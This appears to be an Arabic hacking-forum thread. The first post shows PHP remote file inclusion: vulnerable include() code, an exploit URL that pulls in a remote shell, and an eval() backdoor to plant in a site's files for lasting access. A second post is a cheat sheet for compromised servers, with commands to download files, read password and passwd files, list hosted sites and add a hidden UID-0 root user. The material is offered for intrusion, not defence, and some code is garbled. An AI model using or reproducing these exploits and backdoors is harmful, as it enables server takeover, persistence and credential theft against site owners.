ثغره rfi واستغلالها remot file inc

[S4wDz]

السلام عليكم ورحمه الله وبركاته
ثغره قديمه (لايعني انها انتهت بالكامل رغم انها اكثر ثغره قد لا تجدها )من ايام 2003 انتشرت وكان الهكر يتسابقو في رفع
الشلات عكس اليوم نتسابق برفع الاندكسات

الثغره ايام زمان كان لا يخلو موقع الا مصاب فيها وكان الحل الوحيد لها هو ترقيه اصدار php

الى اصدار php 5

الجانب الثاني من الثغره هو انها رائعه بزرع كود يمكننا تسميته خبيث يحيث نزرع الثغره نفسها
بالملفات الخاصه بالموقع

وهذا يساعدنا على بقاء خط رجعه للسيرفر بالوقت الذي نريد

واحيانا يلزم بشكل كبير عندما تتمكن من تخطي حمايه موقع ما ورفع شل لكن الحجم غير مناسب
بحيث يجبرك الموقع على رفع شل بحم مثلا 60 كيلو بايت وهذا قليل جدا ويصعب ايجاد شل بهذه المواصفات

اما الشيء الثاني عندما ترفع شل من ثغره ما اخرى لا يظهر لديك الشل والسبب حمايه السيرفر تمع بعض اكواد
الشل بالتالي يظهر لديك خطا evil()
وهذا يسبب لك الازعاج فيمكنك رفع شل الثغره لكي تطلع ع حمايه السيرفر وتفتكر طريق مناسبه للتخطي
وهون بدك تغير الشل الي معاك لشل اخر
الجانب الاخير ان بالرغم من ان الكود معقد للاصدار php5 ,من شبه المستحيل ان تلقى مبرمج فعلها الا ان
الجانب الخير موجود بالمبرمجين فهناك من يستخدم هذا الكود وبالتالي يقع بالثغره لكن نادرا
الان خلصنا مقدمه عن الثغره (كتاب تاريخ وجغرافيا )

نبدا بالاستغلال

في حال الphP4 نبد ب ـ
كود PHP:

كود PHP:

include($base_path . "/foo.php"); 


او هذا الكود

كود PHP:

include($_REQUEST***91;'base_path'***93; . '/foo.php'); 


]
نشرح
هي الداله الي عملت لنا ثغره الانكلود وهناك مزيد من الدوال
( Include و Include_once و Require و Require_once )

هنا هذا المتغير المصاب بالثغره وهو الذي منه ندرج الانكلود او ملف ما من خارج السيرفر

وهكذا
[PHP]
php4 php5 include base_path xxxxxxxxxxx.com/xxx.php?base_path=http://mysit.com/shell.txt?
[/PHP
]
هنا كود الانكلود لاصدار php5

<?php
if($_GET***91;dz4all***93{
$file=implode("\n",file($_GET***91;$dz4all***93);
$dz4all=str_replace("<?php", "",$file);
$dz4all=str_replace("<?", "",$dz4all);
$dz4all=str_replace("?>", "",$);
eval($dz4all);
}

المتغير المصاب dz4all الباقي عليكم

لمزيد من التساولات يرجي ادراجها تحياتي []
الشرح التالي يكون على

[]

[S4wDz]

أوامر الضغط وفك الضغط مثال على الأمر للتوضيح الأمر كتابتاً وظيفة الأمر qzip failname qzip zip أمر الضغط بامتداد unzip failname unzip zip امر فك الضغط بامتداد tar -zcf zz.tar daily tar -zcf tar أمر الضغط بامتداد tar -zxf zz.tar tar -zxf tar أمر فك الضغط بامتداد tar -czvffilename.tar.gz filename.sql tar -czvf gz أمر ضغط الملف بامتدا gzip -d file.gz gzip -d gz فك الضغط بامتداد tar -czvf filename.tar.gzfile name.sql tar -czvf كيفية ضغط قاعدة البيانات tar -zxvf file name.tar.gz tar -zxvf كيفية فك قواعد البيانات tar -czvf /home/user/public_html/n3.tar.gzn3 tar -czvf tar.gz امر ضغط المجلدات بامتداد

أوامر الداخلية مثال على الأمر للتوضيح الأمر كتابتاً وظيفة الأمر ls ls استعراض الملفات ls ls -la استعراض الملفات والمجلدات المخفية والتصاريح pwd pwd تحديد المكان علىالسيرفر ls;pwd ; اداة الربط بين الأوامر wget http://xxxx.com/xxx.zip
wget أمرالسحب curl -o ./xxx.zip http://xxxx.com/xxx.zip curl -o ./ امر السحب الآخر history history أمر معرفة جميع الأوامر التي نفذت بالشل mkdir shuooon mkdir انشاء مجلد جديد rm failname rm أمر الحذف rm -r dir rm -r حذف مجلد بجميع الملفات editfailname edit أمر التعديل who who امر التصلين على السيرفر cd cd امر دخول المجلدات cd .. cd .. امر العودة للخلف mv mv امر اعادة التسمية find find امر البحث ./ ./ أمر تشغيل الباك دور uname -a uname -a أمر معرفة اصدار السيرفر ls ftp.zip* * امر يرمز للكل man ls man امر المساعدة drwxrwxrwx chmod 777 dd chmod أمر إعطاء التصريح touch shuooon.php touch أمر انشاء ملف فارغ gcc xxx.c -o xxx gcc
ترجمة الكومبايل او الاكسبلويت
usr/bin/perl يبدأ الكود بهذه الكلة لا يحتاج ترجمة ملفات البيرل تبدأ بــ
include يبدأ الكود بهذه الكلة ترجمة وتشغيل فقط ملفات السي تبدأ بــ أوامر الخارجية مثال على الأمر للتوضيح الأمر كتابتاً وظيفة الأمر cat /home/*/public_html/_vti_pvt/access.cnf cat عرض جميع المواقع التي على السيرفر cat /home/*/public_html/_vti_pvt/service.pwd cat عرض جميع الباسووردات على السيرفر cat /usr/local/apache/conf/httpd.conf cat لمعرفة عرض مصدر السيرفر find / -name httpd.conf find عرض المصدر more /etc/userdomains more CAT امر مشابة للأمر pico /home/burst/public_html/index.html pico تحرير النصوص vi /home/burst/public_html/index.html vi امر تحرير به الكثير من المزايا لكنه اصعب من السابق valiases المهم نحدد ls -la /etc/valiases ls معرفة المواقع اللي على السيرفر مع اليوزر ls /var/named ls معرفة جميع المواقع اللي على السيرفر valiases المهم نحدد ls /usr/local/psa/home/vhosts/ ls معرفة جميع المواقع على السيرفر perl xxxx.pl perl تشغيل البيرل cat /etc/passwd ابحث عن bash cat امر استخراج حسابات الشل height="250" scrolling="no"> اكتب الامر التالي لاضافه يوزر بصلاحيات الروت ومضاف الى مجموعه الروت :

/usr/sbin/useradd -o -u 0 -g 0 dz4all -p adminR00t

تفاصيل الامر

طبعا اليوزراللي هو روت:dz4all
والباسورد : adminR00t

-o : لاستخدام تغيرات مع الامر
-u : لاضافته الى مجموعه اليوزر ذات رقم 0 ( الي هي الروت )
-g : group او المجموعه ذات رقم 0 يعني مجموعه الروت ايضا .
----------------
ونجي بامر ثاني نفس الامر الاول .
ايضا تقدر عن طريق هذا الامر:

/usr/sbin/useradd -o -u 0 dz4all
ومن بعدها تدخل لهذا المستخدم باسورد يعني تضيف باسوورد جديد للمستخدم واذا تبي تغير باسوورد يوزر كذا بعد بالطريقه التاليه:


بعدين بيطلع لك الرساله التاليه:

تكتب باسوورد جديد ولازم يكوون صعب ومعقد (:

بعدين تطلع لك رساله زي كذا يعني ادخلها مره ثانيه:

يعني اعد ادخال كلمه المرور
اعد كتابتها ,, بيعطيك الرساله التاليه :

passwd: all authentication tokens updated successfully.
passwd dz4all New UNIX password: Retype new UNIX password: Changing password for user dz4all.ومبرووك عليك صلاحيات مستخدم روت جديده (:

سوف يتم ادراج دورة خاصة مشروحة بالفيديو عن قريب مهداة الى كل الاعضاء
dz4all
مازال نكملو في هذا الميضوع

[ExPLo!T_Dz]

باترك الله فيك

[BaKaRoW]

جزاك الله خيرا يا اخي